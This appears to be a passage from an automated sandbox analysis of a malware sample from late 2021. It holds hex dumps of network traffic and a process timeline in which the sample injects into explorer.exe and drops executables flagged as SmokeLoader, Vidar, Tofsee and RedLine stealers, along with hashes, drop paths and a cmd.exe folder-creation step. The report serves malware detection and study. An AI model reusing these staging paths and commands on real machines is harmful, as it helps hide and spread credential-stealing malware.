ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00
                                                                                                                                                                                                          Data Ascii: Ollllllllllllllllllll
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC2058INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 10 ff ff ff 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff d6 c8 9e ff ac 91 3f ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00
                                                                                                                                                                                                          Data Ascii: ?lllll
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC2066INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC2074INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f ff ff ff ff ff ff ff ff f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1f ff ff ff ff ff ff ff ff f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f ff ff ff ff ff ff ff ff f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f ff ff ff ff ff ff ff ff e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ff ff ff ff ff ff ff ff c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 ff ff ff ff ff ff ff ff 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 ff ff ff ff ff ff ff ff 00 00 00
                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC2082INData Raw: 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 98 75 10 ff d6 c8 9e ff ff ff ff ff ff ff ff 8f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 9f ff ff ff ff ba a3 5f ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff a5 87 2f ff ac 91 3f ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff ba a3 5f ff ff ff ff
                                                                                                                                                                                                          Data Ascii: llllllllllllu_llllllllllll/?llllllllllllll_
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC2090INData Raw: ff 80 00 00 01 ff 00 00 ff 00 00 00 00 ff 00 00 fe 00 00 00 00 7f 00 00 fc 00 00 00 00 3f 00 00 f8 00 00 00 00 1f 00 00 f0 00 00 00 00 0f 00 00 e0 00 00 00 00 07 00 00 e0 00 00 00 00 07 00 00 c0 00 00 00 00 03 00 00 c0 00 00 00 00 03 00 00 80 00 00 00 00 01 00 00 80 00 00 00 00 01 00 00 80 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 00 01 00 00 80 00 00 00 00 01 00 00 80 00 00 00 00 01 00 00 c0 00 00 00 00 03 00 00 c0 00 00 00 00 03 00
                                                                                                                                                                                                          Data Ascii: ?
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC2098INData Raw: 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff f1 ed df ff ff ff ff 8f ff ff ff 20 ff ff ff ff c1 ac 6f ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff f8 f6 ef ff c1 ac 6f ff ac 91 3f ff c9 b5 7f ff f8 f6 ef ff ff ff ff ff d6 c8 9e ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff c1 ac 6f ff ff ff ff ff ff ff ff 20 00 00 00 00 ff ff ff 8f f8 f6 ef ff a5 87 2f ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff f1 ed df ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff eb e4 cf ff 98 75 10 ff 91 6c 00 ff 91 6c 00 ff a5 87 2f ff f8 f6 ef ff ff ff ff 8f 00 00 00 00 00 00 00 00 ff ff ff 10 ff ff ff cf f8 f6 ef ff a5 87 2f ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff ac 91 3f ff c9 b5 7f ff c9 b5 7f ff b3 9a 4f ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff a5 87 2f ff f8 f6 ef ff ff ff ff
                                                                                                                                                                                                          Data Ascii: llll ollllo?lllo /lllull//lll?Olll/
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC2106INData Raw: c4 3c ca 3e ce 3e d2 3e d6 3e 70 3f 74 3f 78 3f 7c 3f b0 3f bc 3f c8 3f d4 3f e0 3f ec 3f f8 3f 00 10 02 00 4c 01 00 00 04 30 10 30 1c 30 28 30 34 30 40 30 4c 30 58 30 64 30 70 30 7c 30 88 30 94 30 a0 30 ac 30 b8 30 c4 30 d0 30 dc 30 e8 30 f4 30 00 31 0c 31 18 31 24 31 30 31 3c 31 48 31 54 31 60 31 6c 31 78 31 84 31 90 31 9c 31 a8 31 b4 31 c0 31 cc 31 d8 31 e4 31 f0 31 fc 31 08 32 14 32 20 32 2c 32 38 32 44 32 50 32 5c 32 68 32 74 32 80 32 8c 32 98 32 a4 32 b0 32 c0 32 cc 32 d8 32 e4 32 f0 32 fc 32 08 33 14 33 20 33 2c 33 38 33 44 33 50 33 5c 33 68 33 74 33 80 33 8c 33 98 33 a4 33 b0 33 bc 33 c8 33 84 3d 8c 3d 94 3d 9c 3d a4 3d ac 3d b4 3d bc 3d c4 3d cc 3d d4 3d dc 3d e4 3d ec 3d f4 3d fc 3d 04 3e 0c 3e 14 3e 1c 3e 24 3e 2c 3e 34 3e 3c 3e 44 3e 4c 3e 54
                                                                                                                                                                                                          Data Ascii: <>>>>p?t?x?|????????L000(040@0L0X0d0p0|00000000000111$101<1H1T1`1l1x11111111111122 2,282D2P2\2h2t22222222222233 3,383D3P3\3h3t33333333================>>>>$>,>4><>D>L>T


                                                                                                                                                                                                          Code Manipulations

                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:19:21:59
                                                                                                                                                                                                          Start date:31/12/2021
                                                                                                                                                                                                          Path:C:\Users\user\Desktop\3YzgU3S0nW.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\3YzgU3S0nW.exe"
                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                          File size:347136 bytes
                                                                                                                                                                                                          MD5 hash:720B195655E0A571C4D511088B51202B
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:low

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:19:22:01
                                                                                                                                                                                                          Start date:31/12/2021
                                                                                                                                                                                                          Path:C:\Users\user\Desktop\3YzgU3S0nW.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\3YzgU3S0nW.exe"
                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                          File size:347136 bytes
                                                                                                                                                                                                          MD5 hash:720B195655E0A571C4D511088B51202B
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000002.333615016.00000000004D1000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000002.333559627.00000000004A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                          Reputation:low

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:19:22:02
                                                                                                                                                                                                          Start date:31/12/2021
                                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                                                                                                          Imagebase:0x7ff70d6e0000
                                                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:19:22:02
                                                                                                                                                                                                          Start date:31/12/2021
                                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                                                                                          Imagebase:0x7ff70d6e0000
                                                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:19:22:03
                                                                                                                                                                                                          Start date:31/12/2021
                                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                                                                                          Imagebase:0x7ff70d6e0000
                                                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:19:22:03
                                                                                                                                                                                                          Start date:31/12/2021
                                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                                          Imagebase:0x7ff70d6e0000
                                                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:19:22:03
                                                                                                                                                                                                          Start date:31/12/2021
                                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                                                                                          Imagebase:0x7ff70d6e0000
                                                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:19:22:03
                                                                                                                                                                                                          Start date:31/12/2021
                                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                                                                                                                                          Imagebase:0x7ff70d6e0000
                                                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:19:22:04
                                                                                                                                                                                                          Start date:31/12/2021
                                                                                                                                                                                                          Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                                                                                          Imagebase:0x7ff76eae0000
                                                                                                                                                                                                          File size:163336 bytes
                                                                                                                                                                                                          MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:19:22:05
                                                                                                                                                                                                          Start date:31/12/2021
                                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                                                                                                          Imagebase:0x7ff70d6e0000
                                                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:19:22:08
                                                                                                                                                                                                          Start date:31/12/2021
                                                                                                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                          Imagebase:0x7ff720ea0000
                                                                                                                                                                                                          File size:3933184 bytes
                                                                                                                                                                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000000.322063888.0000000004DE1000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:19:22:23
                                                                                                                                                                                                          Start date:31/12/2021
                                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                                          Imagebase:0x7ff70d6e0000
                                                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:19:22:37
                                                                                                                                                                                                          Start date:31/12/2021
                                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                                          Imagebase:0x7ff70d6e0000
                                                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:19:22:41
                                                                                                                                                                                                          Start date:31/12/2021
                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\ahtdegs
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Roaming\ahtdegs
                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                          File size:347136 bytes
                                                                                                                                                                                                          MD5 hash:720B195655E0A571C4D511088B51202B
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                          • Detection: 44%, ReversingLabs

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:19:22:41
                                                                                                                                                                                                          Start date:31/12/2021
                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\7085.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\7085.exe
                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                          File size:347136 bytes
                                                                                                                                                                                                          MD5 hash:720B195655E0A571C4D511088B51202B
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                          • Detection: 44%, ReversingLabs

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:19:22:44
                                                                                                                                                                                                          Start date:31/12/2021
                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\7085.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\7085.exe
                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                          File size:347136 bytes
                                                                                                                                                                                                          MD5 hash:720B195655E0A571C4D511088B51202B
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000011.00000002.387454153.00000000006A1000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000011.00000002.387405814.0000000000530000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:19:22:44
                                                                                                                                                                                                          Start date:31/12/2021
                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\ahtdegs
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Roaming\ahtdegs
                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                          File size:347136 bytes
                                                                                                                                                                                                          MD5 hash:720B195655E0A571C4D511088B51202B
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:19:22:48
                                                                                                                                                                                                          Start date:31/12/2021
                                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                                          Imagebase:0x7ff70d6e0000
                                                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:19:22:55
                                                                                                                                                                                                          Start date:31/12/2021
                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\8132.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\8132.exe
                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                          File size:350720 bytes
                                                                                                                                                                                                          MD5 hash:A181F86F7191ED7680953213C7239305
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.426246720.0000000000813000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000016.00000002.426246720.0000000000813000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:19:22:57
                                                                                                                                                                                                          Start date:31/12/2021
                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\8A8A.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\8A8A.exe
                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                          File size:347648 bytes
                                                                                                                                                                                                          MD5 hash:AD639AA5FF468BA6F8A7503FD5BF89BD
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000017.00000002.444369187.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000017.00000002.444506788.0000000000860000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000017.00000003.406594617.0000000000880000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:19:23:00
                                                                                                                                                                                                          Start date:31/12/2021
                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\9355.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\9355.exe
                                                                                                                                                                                                          Imagebase:0xf0000
                                                                                                                                                                                                          File size:537600 bytes
                                                                                                                                                                                                          MD5 hash:7FCE0E163EA7948C10B044B1EA77DAD9
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000018.00000002.448461054.0000000003591000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000018.00000002.448220318.0000000003421000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                          • Detection: 63%, ReversingLabs

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:19:23:05
                                                                                                                                                                                                          Start date:31/12/2021
                                                                                                                                                                                                          Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                                                                                          Imagebase:0x7ff731350000
                                                                                                                                                                                                          File size:455656 bytes
                                                                                                                                                                                                          MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:19:23:06
                                                                                                                                                                                                          Start date:31/12/2021
                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                          Imagebase:0x7ff7f20f0000
                                                                                                                                                                                                          File size:625664 bytes
                                                                                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:19:23:06
                                                                                                                                                                                                          Start date:31/12/2021
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Windows\SysWOW64\cmd.exe" /C mkdir C:\Windows\SysWOW64\tfktmtml\
                                                                                                                                                                                                          Imagebase:0xd80000
                                                                                                                                                                                                          File size:232960 bytes
                                                                                                                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:19:23:07
                                                                                                                                                                                                          Start date:31/12/2021
                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                          Imagebase:0x7ff7f20f0000
                                                                                                                                                                                                          File size:625664 bytes
                                                                                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
